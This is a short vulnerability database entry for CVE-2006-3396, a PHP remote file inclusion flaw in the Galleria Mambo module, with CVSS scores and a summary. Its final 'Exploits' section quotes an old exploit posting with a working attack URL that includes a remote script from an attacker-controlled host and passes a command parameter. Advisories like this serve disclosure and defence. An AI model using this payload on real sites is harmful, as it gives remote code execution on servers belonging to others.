6.8
CVSSv2

CVE-2006-3396

Published: 06/07/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in galleria.html.php in Galleria Mambo Module 1.0 and previous versions for Mambo allows remote malicious users to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

miro international galleria 1.0 for mambo

Exploits

Title : galleria <= 10 Remote File InclusionVulnerability - URL : binarydigitat/ - Author : sikunYuk - Mail : ineal[at]gmailcom - exploit : [target]/[path]/components/com_galleria/galleriahtmlphp?mosConfig_absolute_path=[f*ckscript]/cmdtxt?&cmd= - greatz : agoes,skulmatic,Olibekas ...